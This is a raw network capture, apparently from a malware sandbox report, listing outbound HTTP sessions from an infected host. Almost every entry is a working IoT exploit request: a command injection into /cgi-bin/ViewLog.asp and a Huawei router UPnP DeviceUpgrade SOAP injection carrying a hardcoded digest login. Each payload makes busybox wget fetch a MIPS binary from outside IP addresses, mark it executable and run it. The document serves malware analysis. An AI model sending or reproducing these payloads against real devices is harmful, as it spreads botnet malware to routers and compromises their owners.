                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              735192.168.2.135661494.122.225.488080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:11.304384947 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              736192.168.2.1333096156.254.71.22537215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:11.906214952 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:13.574177980 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:15.526185036 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:18:19.558166027 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              737192.168.2.135886494.121.111.228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.126411915 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              738192.168.2.135296662.29.91.528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.128515005 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              739192.168.2.134519631.200.41.208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.132364035 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              740192.168.2.133298831.136.132.1378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.253679037 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:15.462268114 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.606154919 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              741192.168.2.133333894.122.68.1648080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.293004036 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              742192.168.2.135495694.122.215.328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.293211937 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              743192.168.2.134090885.206.56.818080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.325114012 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.510154963 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:14.886159897 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.766191006 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              744192.168.2.135225294.121.29.1648080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.326513052 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
